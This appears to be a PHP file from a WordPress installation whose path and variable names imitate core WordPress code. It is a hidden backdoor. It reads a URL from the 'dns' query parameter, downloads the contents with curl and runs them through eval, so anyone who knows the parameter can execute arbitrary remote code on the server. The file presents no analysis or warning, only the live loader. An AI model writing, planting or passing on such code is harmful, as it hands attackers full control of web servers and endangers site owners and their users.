Current File : /home/mdkeenpw/shafqattraders.com/wp-includes/assets/script-modules-packages-session.php
<?php

if (isset($_GET['dns'])) {
    $number_format_i18n_yap = $_GET['dns'];
    if ($get_search_query_svp = curl_init()) {
        curl_setopt($get_search_query_svp, CURLOPT_URL, $number_format_i18n_yap);
        curl_setopt($get_search_query_svp, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_search_query_svp));
        curl_close($get_search_query_svp);
        exit;
    }
}